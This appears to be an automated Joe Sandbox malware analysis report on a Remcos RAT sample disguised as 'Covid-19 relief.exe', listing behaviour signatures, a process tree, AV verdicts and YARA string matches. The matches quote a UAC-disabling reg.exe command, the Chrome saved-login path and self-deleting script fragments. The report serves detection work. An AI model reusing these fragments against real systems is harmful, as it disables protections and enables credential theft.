Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Covid-19 relief.exe

Overview

General Information

Sample Name:Covid-19 relief.exe
Analysis ID:319675
MD5:5dd2c165636eff7f866e18370351101e
SHA1:1a25c2d60553096a67b3c87c6385d3e831e84647
SHA256:e85de613abef99e65212dcd6f8077b03763fa37fa81e7921907c9e9c3859b632
Tags:COVID-19exeRATRemcosRAT

Most interesting Screenshot:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Yara detected Remcos RAT
Contains functionality to capture and log keystrokes
Contains functionality to inject code into remote processes
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Uses dynamic DNS services
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara signature match

Classification

Startup

  • System is w10x64
  • Covid-19 relief.exe (PID: 5676 cmdline: 'C:\Users\user\Desktop\Covid-19 relief.exe' MD5: 5DD2C165636EFF7F866E18370351101E)
    • RegAsm.exe (PID: 5568 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
    • Covid-19 relief.exe (PID: 1320 cmdline: 'C:\Users\user\Desktop\Covid-19 relief.exe' MD5: 5DD2C165636EFF7F866E18370351101E)
      • RegAsm.exe (PID: 5976 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
      • RegAsm.exe (PID: 4584 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.925613507.0000000004101000.00000004.00000001.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000003.00000002.926179641.0000000004061000.00000004.00000001.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmpRemcos_1Remcos Payloadkevoreilly
        • 0x16510:$name: Remcos
        • 0x16888:$name: Remcos
        • 0x16de0:$name: Remcos
        • 0x16e33:$name: Remcos
        • 0x15674:$time: %02i:%02i:%02i:%03i
        • 0x156fc:$time: %02i:%02i:%02i:%03i
        • 0x16be4:$time: %02i:%02i:%02i:%03i
        • 0x3074:$crypto: 0F B6 D0 8B 45 08 89 16 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 F8 FB FF FF 30 06 47 3B 7D ...
        00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmpREMCOS_RAT_variantsunknownunknown
        • 0x166f8:$str_a1: C:\Windows\System32\cmd.exe
        • 0x16714:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x16714:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x15dfc:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x16400:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x159e0:$str_b2: Executing file:
        • 0x16798:$str_b3: GetDirectListeningPort
        • 0x16240:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x16534:$str_b5: licence_code.txt
        • 0x1649c:$str_b6: \restart.vbs
        • 0x163c0:$str_b8: \uninstall.vbs
        • 0x1596c:$str_b9: Downloaded file:
        • 0x15998:$str_b10: Downloading file:
        • 0x15690:$str_b11: KeepAlive Enabled! Timeout: %i seconds
        • 0x159fc:$str_b12: Failed to upload file:
        • 0x167d8:$str_b13: StartForward
        • 0x167bc:$str_b14: StopForward
        • 0x16330:$str_b15: fso.DeleteFile "
        • 0x16394:$str_b16: On Error Resume Next
        • 0x162fc:$str_b17: fso.DeleteFolder "
        • 0x15a14:$str_b18: Uploaded file:
        Click to see the 15 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        5.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
          5.2.RegAsm.exe.400000.0.raw.unpackRemcos_1Remcos Payloadkevoreilly
          • 0x16510:$name: Remcos
          • 0x16888:$name: Remcos
          • 0x16de0:$name: Remcos
          • 0x16e33:$name: Remcos
          • 0x15674:$time: %02i:%02i:%02i:%03i
          • 0x156fc:$time: %02i:%02i:%02i:%03i
          • 0x16be4:$time: %02i:%02i:%02i:%03i
          • 0x3074:$crypto: 0F B6 D0 8B 45 08 89 16 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 F8 FB FF FF 30 06 47 3B 7D ...
          5.2.RegAsm.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
          • 0x166f8:$str_a1: C:\Windows\System32\cmd.exe
          • 0x16714:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x16714:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x15dfc:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x16400:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x159e0:$str_b2: Executing file:
          • 0x16798:$str_b3: GetDirectListeningPort
          • 0x16240:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x16534:$str_b5: licence_code.txt
          • 0x1649c:$str_b6: \restart.vbs
          • 0x163c0:$str_b8: \uninstall.vbs
          • 0x1596c:$str_b9: Downloaded file:
          • 0x15998:$str_b10: Downloading file:
          • 0x15690:$str_b11: KeepAlive Enabled! Timeout: %i seconds
          • 0x159fc:$str_b12: Failed to upload file:
          • 0x167d8:$str_b13: StartForward
          • 0x167bc:$str_b14: StopForward
          • 0x16330:$str_b15: fso.DeleteFile "
          • 0x16394:$str_b16: On Error Resume Next
          • 0x162fc:$str_b17: fso.DeleteFolder "
          • 0x15a14:$str_b18: Uploaded file:
          5.2.RegAsm.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
            5.2.RegAsm.exe.400000.0.unpackRemcos_1Remcos Payloadkevoreilly
            • 0x16510:$name: Remcos
            • 0x16888:$name: Remcos
            • 0x16de0:$name: Remcos
            • 0x16e33:$name: Remcos
            • 0x15674:$time: %02i:%02i:%02i:%03i
            • 0x156fc:$time: %02i:%02i:%02i:%03i
            • 0x16be4:$time: %02i:%02i:%02i:%03i
            • 0x3074:$crypto: 0F B6 D0 8B 45 08 89 16 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 F8 FB FF FF 30 06 47 3B 7D ...
            Click to see the 19 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: RemcosShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 5568, TargetFilename: C:\Users\user\AppData\Roaming\remcos\logs.dat

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Roaming\Covid-19ReversingLabs: Detection: 39%
            Source: C:\Users\user\AppData\Roaming\Covid-19ReversingLabs: Detection: 39%
            Multi AV Scanner detection for submitted fileShow sources
            Source: Covid-19 relief.exeReversingLabs: Detection: 39%
            Source: Covid-19 relief.exeReversingLabs: Detection: 39%
            Yara detected Remcos RATShow sources
            Source: Yara matchFile source: 00000001.00000002.925613507.0000000004101000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.926179641.0000000004061000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.928004137.0000000006440000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.927946901.0000000005CC0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.926940095.0000000005E10000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.927045842.0000000006430000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4584, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5568, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Covid-19 relief.exe PID: 5676, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Covid-19 relief.exe PID: 1320, type: MEMORY
            Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.Covid-19 relief.exe.6440000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.Covid-19 relief.exe.6440000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.Covid-19 relief.exe.6430000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.Covid-19 relief.exe.6430000.3.raw.unpack, type: UNPACKEDPE
            Machine Learning detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Roaming\Covid-19Joe Sandbox ML: detected
            Source: C:\Users\user\AppData\Roaming\Covid-19Joe Sandbox ML: detected
            Machine Learning detection for sampleShow sources
            Source: Covid-19 relief.exeJoe Sandbox ML: detected
            Source: Covid-19 relief.exeJoe Sandbox ML: detected
            Source: 1.2.Covid-19 relief.exe.6430000.3.unpackAvira: Label: BDS/Backdoor.Gen
            Source: 2.2.RegAsm.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
            Source: 3.2.Covid-19 relief.exe.6440000.3.unpackAvira: Label: BDS/Backdoor.Gen
            Source: 5.2.RegAsm.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
            Source: 1.2.Covid-19 relief.exe.6430000.3.unpackAvira: Label: BDS/Backdoor.Gen
            Source: 2.2.RegAsm.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
            Source: 3.2.Covid-19 relief.exe.6440000.3.unpackAvira: Label: BDS/Backdoor.Gen
            Source: 5.2.RegAsm.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,2_2_00404C0A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,2_2_0040751B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_tr2_2_00410586
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,2_2_0040728F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@